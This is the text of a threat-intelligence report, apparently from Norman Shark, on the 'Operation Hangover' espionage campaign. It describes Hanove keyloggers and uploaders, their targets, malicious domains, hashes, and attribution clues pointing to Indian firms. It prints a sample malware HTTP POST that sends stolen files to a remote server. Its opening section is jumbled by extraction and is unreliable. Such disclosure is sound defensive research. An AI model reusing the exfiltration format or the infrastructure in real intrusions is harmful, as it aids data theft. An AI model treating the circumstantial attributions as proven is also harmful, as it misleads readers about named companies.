*.doc.*. What kind of files they look for are usually defined in resources as an extension list.txt.inp. Some variants capture other data as well. aka Hanove The second stage malware are often variants of HangOver.docx.docx.*.php HTTP/1.*. The stolen data are uploaded to remote servers by FTP or HTTP.*.The HangOver malware.rtf. such as clipboard content.xlxs. but overall functionality can vary quite a bit from one subtype to another.*.pdf.xlxs.kmz.ppt. They appear to be written over a common framework as many internal functions are identical.docx. titles of open windows and content of browser edit fields.xlx *.*. name="uploaddir" subfolder/%username-machinename%/C/ --F39D45E70395ABFB8D8D2BFFC8BBD152 Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 16 .*.ppt.*.uti Hanove keyloggers set up keyboard hooks or polls to capture keypresses and log these to a text file.pdf.doc.xls.doc.*.rtf *. and these lists vary.*.*.xlsx.*.*.*.rtf.*. screenshots. Hanove Uploaders recursively scan folders looking for files to upload. boundary=F39D45E70395ABFB8D8D2BFFC8BBD152 User-Agent: EMSFRTCBVD Host: remotedomain.*. A typical HTTP request looks like this: POST /up.pps.*.jpg.*. information stealers written in C++.com Content-Length: 5050 Cache-Control: no-cache --F39D45E70395ABFB8D8D2BFFC8BBD152 Content-Disposition: form-data. The first versions of these may have been based on code from an innocent backup utility as the word “backup” is often present. Timed events are set up to upload the data to the remote server.pps.1 Content-Type: multipart/form-data.*.*. Here are a few examples: *.*.

FMBVDFRESCT. ”Dragonball”. DEMO. mutexes. UPHTTP. 5A902B8B45BEDCB8FFF3F39D152. sendFile Boundary parameters vary between versions. For example. and registry keys. The following have been seen in connection with this family: EMSCBVDFRT. The following have been seen in connection with this family: F39D45E70395ABFB8D8D2BFFC8BBD152.eu” is hidden as “xfbsxfmmhbsnfout/fv” and the word “php” becomes “qiq”. Different variants are frequently given internal names. “FirstBlood” and “Babylon”. Such internal names used include “HangOver”. the domain “wearwellgarments. MBESCVDFRT. MIME boundary tags. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 17 . DEMOMAKE. ”Tourist”. visible through debug paths included in the binary.UserAgent strings vary between versions. MBVDFRESCT TCBFRVDEMS. FFF3F395A90B452BB8BEDC878DDBD152. EMSFRTCBVD. “Ron”. domain names. DSMBVCTFRE. Non-static strings are browser UserAgent strings. paths. D2BFFC8BBD152F3B8D89D45E70395ABF. There are several other malwares and tools in use. 90B452BFFF3F395ABDC878D8BEDBD152 5A9DCB8FFF3F02B8B45BE39D152 78DDB5A902BB8FFF3F398B45BEDCD152 905ABEB452BFFFBDC878D83F39DBD152 8765F3F395A90B452BB8BEDC878 F12BDC94490B452AA8AEDC878DCBD187 String content consists of some strings largely static between variants. which also may be obfuscated by being fragmented. Many Hanove variants use a simple rotating encoding scheme to hide the interesting strings. and some that vary. 90ABDC878D8BEDBB452BFFF3F395D152. ”Klogger”. See appendix C for more indicators. 2BB8FFF3F39878DDB5A90B45BEDCD152.

As can be seen from the examples the attackers have gone to great lengths to make the social engineering aspect as credible and applicable as possible. This showed a geographical distribution where Pakistan was the most affected in volume. However. but also showed a multitude of other countries being represented. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 18 . We have observed the usage of peculiar domain names that are remarkably similar to existing legitimate domains. We have also obtained sinkhole data for a number of domains in question and found open folders with stolen userdata in them. and some IP addresses are probably lab machines. During this investigation we have obtained malware samples and decoy documents that have provided indications as to whom else would be in the target groups. IP counts are misleading for many reasons. enough to identify targets down to IP and machine name/domain level. 13 14 24 28 34 87 6 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 3 44433 4 5 6 PK IR US TW SG IN CN OM RU CA 91 511 PA TH DE FR JO PL Note that these data should be taken as indicative only. One machine can generate many IP addresses. the indication that Pakistan is the most prevalent target seems solid.Target selection We have direct knowledge of only one attack – the one against Telenor. In the following pages we’ve highlighted some of the files we have seen used to attack organizations in different countries.

such as this snippet from a 2012 log entry (subdomain redacted): Host Name: Registered Owner: Time Zone: Domain: PC-PS2CHAIRMAN admin (GMT+05:00) Islamabad.nationalgeographic. such as this seemingly from a Pakistani embassy: “GET /sdata/shopx..pk Sinkhole-logged HTTP requests are also informative... regional culture and religious matters.” Decoy files tailored towards Pakistan revolve around the ongoing conflicts in the region. Pakistani soldiers praying in Karakoram.Pakistan The most obvious target seems to be Pakistan. As is visible above.php?fol=EMBASSYOFPAKIST-Embassy%20of%20Pakistan..com/photography/enlarge/praying-soldiers_pod_image. Karachi ****. computers in Pakistan are by far the most active in connecting to malicious domains. We found logs in the open drop folders that contained suggestive data.gov.html Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 19 . Apparent source: http://photography.

It seems to be sourced from defence.Google images of the Mendhar region in India.pk Additional examples can be found in Appendix B.com/news/2013/Jan/12/mendhar-incident-creates-panic-among-border-residents-29. http://jammu. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 20 .asp A review of Indian future weapon acquisitions. There was a border clash there recently.greaterkashmir.

China China is another country which apparently has been targeted to some extent. but not in the amount as is seen against Pakistani targets. This dump was generated in July 2012 and contains Word documents. Decoys are also present. For example. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 21 . PowerPoint presentations and images. Uploaded archives of harvested data. a scanned document named court_order. Language is simplified Chinese. likely mainland China. Chinese decoy. we found a data dump and keylog seemingly harvested from a computer belonging to a Chinese academic institution.jpg. This is a notification to the family of a criminal about his jail sentence.

182.com. The former appears to be this file: http://f00dlover.info/Khalistan/Victims_want_Sajjan_Kumar_punished.info has historically shared the IP address 173. for example khalistancalling.24. Khalistancalling.104.83) and must be considered owned by the attackers. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 22 .The Khalistan movement This is a political secessionist movement aiming to create a sovereign Sikh nation in the region of Punjab in India. Examples of malware apparently aimed at the movement are md5’s a4a2019717ce5a7d7daec8f2e1cb29f8 and f70a54aacde816cb9e9db9e9263db4aa.254 with many other domains belonging to this infrastructure – for example the domain researcherzone.doc.net which was used in the Telenor intrusion. There are also a number of domains with active web pages that used to exist on this IP.com has since moved on to another bad IP (46.zip It is interesting to note that f00dlover. Violent episodes between supporters of the Khalistan movement and government forces have occurred through history since the movement’s creation in 1971.236.

We have seen at least two attacks apparently aimed at them. though functionality is roughly equivalent.65.65.127 contains a series of domains used by Gimwlog and Auspo malwares.31.The Nagaland movement The Nagaland (or Nagalim) movement is another secessionist group aiming to create a sovereign homeland for the Naga people living in North-Eastern India and North-Western Burma.org on the IP 176.31.124 .126.org has hosted different malware. one (3105b020e2bd43924404bc4e3940191b) connected to fistoffury.176. A sample from 2010. Zeusagency.net on the IP 176. The malware sample also installed an executable which in turn connected back to the domain zeusagency.124.31. md5 168f2c46e15c9ce0ba6e698a34a6769e.65. These are somewhat different from the standard Hanove series. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 23 . The IP range 176.31.65. showed a scanned document which appears to be a letter from the “President of Nagalim”.

Another malicious installer (md5 f1799d11b34685aa209171b0a4b89d06) contained the following decoy: The malware included connects to the domain global-blog.net. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 24 .

notably in Kazakhstan. we have no information to suggest that any of the organizations named in the following pages have been compromised. but during our research we discovered several related attack files that were clearly targeting businesses. the available information strongly indicates that they were targets of interests for the attackers. We want to emphasize that except in the case of BUMI PLC.exe (MD5 2895a9b0cf22cd45421d634dc0f68db1) Detail_description_of_ferro_chrome_silicon_and_ferro_chrome.exe (MD5 e40205cba4e84a47b7c7419ab6d77322) Deatils_for_the_ENRC_Board_Meeting_X1098977e79. Likely target: Eurasian Natural Resources Corporation (ENRC) This company which is headquartered in London has operations in multiple countries.exe (MD5 a5a740ce2f47eada46b5cae5facfe848) Details_for_the_ENRC_Board_Meeting_X10FR333_2012. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 25 . we were initially unaware of other “nonstrategic/political” targets by this attack group.Industrial espionage While the Telenor case was most likely industrial espionage. ENRC__DEBT__INVESTORS__2012__for__your__Reference. The following malwares appear to be aimed at ENRC. However.exe (MD5 d96aa87c25c9c491bee97aad65bafc9e) Gerhard Ammann is also affiliated with ENRC. As can be seen in the example below. the social engineering aspects are more related to business content.exe (MD5 2102a18dc20dc6654c03e0e74f36033f) Gerhard_Ammann_Article_Content_From_Wikipedia.

had been exposed to a spear-phishing attack in July 2012.Known target: Bumi PLC. Bumi is an international mining group listed on the London Stock Exchange. we found a published incident report made by Context Information Security (2). Indonesia When searching for known instances of domains belonging to the attack infrastructure. the malware executable “dua2alhycox12. Mr Samin Tan.com historically acted as name server for. which anoniemvolmacht. This report details how the Chairman of Bumi PLC. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 26 .com. Both the domains mentioned in this report have been connected to the attack group investigated. Source: Context Information Security.org. For example.exe” (c94267ba9c92f241379cdceed58777dc) connects to hycoxcable. The latter domain has also shared IP with the malicious domain chronicleserv.

Target must be assumed to be persons affiliated with Porsche. among them a batch file opening a shortened URL pointing to Porsche Holding’s webmail front in Austria. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 27 . Again. we have no information as to whether any intrusion has occurred.Likely target: Porsche Informatik A malware using the name “webmailapp.exe” (22a3a1d5a89866a81152cd2fc98cd6e2) is a self-extracting archive containing several files. The webmail front of Porsche in Austria.

Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 28 . taken from the malicious executable “Horsemeat_scandal_another_Irish_company_suspends_burger_production. Target is unknown.biz vs the legitimate bluebird-restaurant. like the malicious bluebirdrestaurant. UK.co. One indicator is the decoy file below.infocardiology. Guardian article about a horsemeat scandal in Ireland. However.exe“ (f52154ae1366ae889d0783730040ea85).uk.uk.Possible target: Restaurant industry It appears unlikely that the restaurant and food industry should be the victim of targeted attacks. Another indicator is the use of certain domain names.co. that’s how it appears. The latter is a restaurant in Chelsea. but file was first submitted to the VirusTotal scan service from Great Britain.

48. a spoof of cmegroup. However. An entry on WIPO (4). we found a number of other domains that had shared the IP address 188. One of these domains was cmegroups. shows that a complaint regarding this domain name was leveled by CME against PrivacyProtect.net An interesting question is of course whether there were any attachments to this mail. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 29 .99 with it.net.com. the domain belonging to Chicago Mercantile Exchange. CME is the world's largest futures exchange company (3).info. Source:wipo. the most interesting information is found in the case details.org in 2012. the UN arbitration body for domain name disputes.95. and domain transferred to CME. The complaint was not disputed.Likely target: Chicago Mercantile Exchange While investigating the malicious domain web-mail-services.

alintiqad-newsonline.com: The latter is a US-based manufacturer of composite materials for armor: We do not know (yet) what purpose all these domains have.asp.info vs www. it is a common tactic in targeted attacks.com.com: Delta Airlines. but it’s hard to imagine that the name spoofing is done by anything but malicious intent.sesion. account.us.24s.dll-getlogon-reason-0.de.info vs istpumpenunddosiertechnik.continuelogs.web-mail-services.no: Telenor lynberrg.de.data. mail.infocardiology.auth.evitalcare.info vs.com: The latter is a Lebanese newspaper in Arabic.alintiqad.php.owalogon.telenor.biz vs mail.webmail-login. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 30 .com.info vs mail.Other suggestive domain names that have been used include: server721-hans. deltaairlines.carmel.info vs armordesigns. www.serviceaccountloginservicemail.de-nserver. for example restaurants.com: The latter belongs to Lynberg & Watkins.telenor.com vs lynberg.de: The latter is a German producer of pumps for high-viscosity fluids.carmel.de-nservers. mail.exchweb. a US-based law firm. a US-based law firm.continuelogs. armordesigns.config.com.formdir-1-curl-z2fowaz2f.org vs deltaairlines.continuelogs.no-cookieauth.blogspot.digitalapp.org.de: The latter is the mail server for several German businesses. server721-han.services.bin.us: The latter is the webmail address of Carmel&Carmel.istpumpenunddosiertechnik.

The trojans used against Telenor did not contain any such person name. these trojans are based on the same code and exhibit similar behaviour.pdb C:\Users\neeru rana\Desktop\Klogger.7 (Startup) uploader\Release\Http_t.5.pdb C:\Users\Yash\Desktop\New folder\HangOver 1.30 may\Klogger.Attribution The continued targeting of Pakistani interests and origins suggested that the attacker was of Indian origin. R:\payloads\ita nagar\Uploader\HangOver 1. many of the Visual Basic keyloggers contained the name “Yash”.vbp” Related cases (4ad80ff251e92004f56bb1b531175a49. or maybe they were unaware of their presence. It is not very common to find malware with debug paths. bfd2529e09932ac6ca18c3aaff55bd79) “C:\miNaPro. which might be an abbreviation for several Indian names. Project and debug paths Curiously.7 (Startup)\HangOver 1. many of the executables we uncovered from related cases contained cleartext project and debug path strings (see Appendix D for full list).30 may\Release\Klogger.vbp” This similarity is not coincidental.7 (Startup)\Release\Http_t.pdb Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 31 .5. This and other text strings we initially saw gave further hints towards Indian attackers.5. but the Visual Basic project name is clearly related to others: Telenor case (02d6519b0330a34b72290845e7ed16ab. First. 3d6a8b2df08443c2aa4b6a07a9b55b16) “D:\YASH\PRO\MY\DELIVERED\2012\DOWNLOADERS\compiled\NewSmack(sep2012)\miNaPro. but these particular threat actors did not seem to mind leaving such telltale signs. These paths gave more indicators that the attackers were Indian.

The projects seem to be delegated into tasks. .0\Klogger..3. . .5.May Payload\new keylogger\Flashdance1. ...........\Monthly Task\August 2011\USB Prop\...30 may\. This is visible in the way the projects themselves are organized: . .\final project backup\complete task of ad downloader & usb grabber&uploader\.\task information\task of september\Tourist 2..2\........ like the string “VB Team Matrix Production” found in a sample (fa6d2483f766f8431b6c0a8c78178d48). There are many diverging project paths which points towards different persons working on separate subprojects.... together with the loose project structures may indicate that development work is being outsourced.\Sept 2012\Keylogger\Release\..Desktop\Feb 2012\kmail(httpform1.ner\Task\HangOver 1.2.2\Release.0... .A managed environment The project paths also give a rare glimpse into something we almost never see – a managed malware creation environment. Some series of malware contain strings like “delivered”. There are hints at team structures..1) . Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 32 .. but apparently not using a centralized source control system. . of which some seem to follow a monthly cycle....... where multiple developers are tasked with specific malware deliverances..D:\YASH\PRO\MY\DELIVERED\2012\DOWNLOADERS\compiled\.\June mac paylods\final Klogger-1 june-Fud from eset5. .7 (Startup) uploader\... .4. which. an indication that a separate team works with Visual Basic development.\august\13 aug\HangOver 1.

the strings “Appin”. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 33 .The word “Appin”. One example of this peculiarity is debug paths inside malware files: C:\BNaga\backup_28_09_2010\threads tut\pen-backup\BB_FUD_23\Copy of client\ Copy of client\appinbot_1.0\appinbot_1. or maybe there are other explanations.0. “AppinSecurityGroup”.3. In a great number of isolated cases and contexts. Maybe some rogue agent within Appin Security Group is involved. we are not implicating or suggesting inappropriate activity by Appin.pdb C:\BNaga\SCode\BOT\MATRIX_1. Getting to the bottom of that is beyond our visibility.2_120308\Build\Win32\Release\deleter. Maybe someone has tried to hurt Appin by falsifying evidence to implicate them.pdb C:\Documents and Settings\Administrator\Desktop\Backup\17_8_2011\MATRIX_1.0\Release\Ron.2_120308\Build\Win32\Release\appinclient. For example.2.pdb One should note that anyone can add or change such text strings.pdb C:\BNaga\kaam\Appin SOFWARES\RON 2. By this.2. and “Matrix” are frequently found inside executables. the word “Appin” shows up and there seems to be some connection with the Indian security company called Appin Security Group.pdb D:\Projects\Elance\AppInSecurityGroup\FtpBackup\Release\Backup.4\CLIENT\ Build\Win32\Release\appinclient.

COM: Registrant: NA Prakash (mail@gmail.com). and a few of these have been suspended and lost their privacy protection. For example. like hackerscouncil. but only almost. BLUECREAMS. the following malicious domains all used the same registration information NITR0RAC3. Kohat Enclave Delhi Delhi. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 34 . S3RV1C3S.com which May 12th 2011 had the following entry (source: gwebtools.COM. There are a large number of domains used.NET. the privacy-protection of domain registrations is almost perfect.110034 IN Tel.COM.COM.9873456756 Identical registration information is also used for other domains that seem unrelated to the attack infrastructure.com) Jain TY-76. VALL3Y. GAUZPIE.Domain registrations As mentioned. +011.

Ltd.NSP.com was registered by Appin Technologies (5). Delhi Delhi.110034 IN Tel.April 3th 2011. which removed its privacy protection: PIEGAUZ. Metro Heights. at which time the domain was operational and accepted uploads from the malware (6). Metro Heights. PitamPura. +45.NET Registrant: PrivacyProtect. HACKERSCOUNCIL.net. The day after it was put under privacy protection.COM Registrant: Appin Technologies Rakesh Gupta (rakesh. October 31st 2010.org Moergestel null.gupta@appinonline.110034 IN Tel. PitamPura. a little over a month before the registration entry above. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 35 .NSP.1147063300 Creation Date: 21-Apr-2010 Expiration Date: 21-Apr-2011 The domain bluecreams. visit Privacyprotect.com) 9th Floor.com) 9th Floor.5066 ZH NL Tel.36946676 One trojan using this domain (md5 4a44b6b6463fa1a8e0515669b10bd338) was submitted to the ThreatExpert analysis service October 28th 2010.NET Registrant: Appin Technologies Rakesh Gupta (rakesh.1147063300 Creation Date: 17-Sep-2009 Expiration Date: 17-Sep-2011 The domain piegauz. Delhi Delhi.org Domain Admin (contact@privacyprotect. hackerscouncil.O.All Postal Mails Rejected. This is possibly a coincidence. +91. In the period from end of June 2010 to February 2011 it was documented as download domain for several trojans (7).org) P. +91. Box 97 Note . It was suspended Apr 18th 2011 and then displayed the already mentioned Prakash Jain as registrant. which was used as a Command and Control domain for several trojan configurations was created April 21st 2010 and had the following initial registration information: PIEGAUZ. the domain got suspended.gupta@appinonline. Sept 17th 2009.com was initially registered by Appin Security Solutions Pvt. Three days later.

Escape character is '^]'. ezservicecenter. secuina.22.178. go-jobs. Connected to 178.192 .net..eu. 220 transformer13_appin ESMTP Exim 4.org. This web site which offers bounties for zeroday exploits. claims to be founded by “Appin Morpheus” and powered by Appin.com and maxtourguide.24. Source: bgwhois.info inhabit the IP space 178.32.80.75.75.193. 23 Mar 2013 20:36:34 +0300 Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 36 .com Also the live behaviour of some domains shows the word Appin. 8.44).75. This domain has a history of resolving to a series of malicious IP addresses used for malware attacks (173.1 Sat.200.197.Another example is the domain zerodayexploits.75..32.32. wearwellgarments.254.org.236.193.32.net.net.193 587 Trying 178. All these IP’s return a recognizable ESMTP banner: $ telnet 178. shoperstock. The malicious domains alr3ady.32.75.

94.182. We then found the apparent developer’s profile on Elance. even if the domain was obviously connected.104.153. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 37 .org. we could find no malware that used it. However.org.242). we found this forum post on the Nokia developer forum: Developer username redacted. where the developer posted a snippet of source code: This piece of code appears used for uploading mobile data like IMEI number to softservices.135. The interesting bit was found further down this thread. 89.185. an online employment service for freelance programmers. Instead.81. a domain which has held several of the known malicious IP addresses used by this group (46.Other interesting indicators were found when we examined the domain softservices.207.83.

The developer’s CV on Elance (name redacted). Based on this we suspect that there are or have been projects to develop mobile malware by this group. even if we have not found any related mobile malware in our databases. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 38 .

com -none2012-07-09 New -noneAbove. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 39 .net is currently a privacy protected domain. Mantra Tech Ventures owns abhedya.net 2010-04-23 Transfer Abhedya.net.net 2012-04-23 Transfer Piegauz.com 2010-11-11 Transfer Suspended-domain. Domain Name: ABHEDYA.org) *** ********* ***** ******* ****** Delhi. webmicrosoftupdate.com 2012-06-02 Delete Foundationapi.com is also hosted on the cloud service mantragrid.net and fuzzyfile.net. but it used to be registered by one Arun Bansal. which seems to be a name server service for domains registered by them.com.Mantra Tech Ventures and INNEFU Mantra Tech Ventures is the registration service for several of the malicious domains that have been in use. The log contained data from a lab test PC whose registered owner was “innefu”.net -none2010-11-04 New -noneSuspended-domain.com abedhya. Abhedya is also visible in the PIEGAUZ. Abhedya has been used by several sites in the attack infrastructure like currentnewsstore. crvhostia.com Piegauz.net.org.com.com.NET Registrant: HackingTruths Arun Bansal (arun@hackingtruths. a Mantra Ventures company.NET name server history: Event Date Action Pre-Action Server Post-Action Server ============================================================================= 2010-04-22 New -noneAbhedya. mymyntra.net Piegauz. and n00b4u. This log folder was named “test” and data in it was uploaded from an IP belonging to the French provider OVH.net Foundationapi. In addition. CEO and founder of Mantra Ventures and the “Ethical Hacking Institute” hackingtruths.net. There is another interesting detail: We found a connection log on one of the open drop folders earlier mentioned.net 2010-11-01 Delete Piegauz. The service first came to our attention because it was used for registering the Command & Control domains cobrapub.com.110085 IN The domain appinonline.

and if so who commissioned them or whether all attacks were commissioned by one entity or by several. confirmed once again by looking at the data we have been able to uncover. but history has shown that social engineering based attacks can be very successful.com was registered by the same Arun Bansal. The methods used were primarily based on different social engineering tactics rather than exploits. and it is possible that INNEFU (if indeed the mentioned log came from them) just happened to run the malware in an automatic test system like many other security vendors do as part of their malware analysis research. The domain innefu. government and political organizations around the world for over three years. We have no visibility into whether the attacks were done on behalf of others. Innefu also hires “ethical hackers”: It is possible that Mantra Tech Ventures hosted the malicious sites by coincidence. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 40 .There is indeed an Indian information security consulting group named Innefu. though these data are circumstantial and may be attempts to implicate said companies. Conclusion When researching the attack against Telenor we were able to uncover that actors apparently operating from India have been conducting attacks against business. There are also indicators of involvement by private sector companies or persons connected to these. Organizations today need to realize that it’s not a matter of whether they will be compromised but a question of when and have a plan in place for how to deal with those compromises.

6. Scumware. WIPO. Viruswatch. [Online] http://www. ThreatExpert Analysis.254. Virus-sites with status changes.org. Passive DNS data provided by ISC Security (https://security. Wikipedia. scumware.org.24.org.html.oapi. 8. Scumware. [Online] http://en. [Online] http://www.org/wiki/CME_Group.com/report. Stuart.org. Scumware search.scumware. Domaintools History.net/amc/en/domains/search/text. WIPO Arbitration and Mediation Center. MacKenzie.co.aspx?md5=4a44b6b6463fa1a8e0515669b10bd338.com.pdf. WIPO. [Online] http://www.jsp?case=D2012-1666. [Online] http://www. ThreatExpert. 7. 5.org/) Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 41 .scumware.236. [Online] http://www. CME Group.com. 2.com/research/whoishistory/?page=details&domain=hackerscouncil.domaintools. Clean-MX.isc. [Online] http://lists.threatexpert. [Online] http://www.com&date=2011-04-03. 4. Domaintools.org/report/bluecreams. Wikipedia. 3.cleanmx.wikipedia.com/pipermail/viruswatch/20110317/023586. Domaintools.Bibliography 1. Scumware.uk/tto/multimedia/archive/00372/DOC100113100120132_372895a. Scumware search.wipo.org/report/173.thetimes.

Some related cases based on behaviour and malware similarity parameters. Sample MD5’s Contact Us: Norman Shark 1855 1st Avenue. Powered by patented Norman SandBox technology.Appendixes (available in a separate document) A. Norman AS is a global leader and pioneer in proactive security software solutions and forensics malware tools.norman. CA 92101 USA 1-888-GO-NORMAN http://enterprise. IP addresses connected to case G. Norman was established in 1984 and is headquartered in Norway with continental Europe. Suite 201 San Diego. UK an d US as its main markets Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 42 . Project and debug paths extracted from executables E. Norman AS offers Enterprise customers solutions for building defensible networks against advanced targeted attacks. Malware string indicators D. Samples extracted from Telenor intrusion B. C.com Founded in Norway. Domain names connected to case F.

Sign up to vote on this title
UsefulNot useful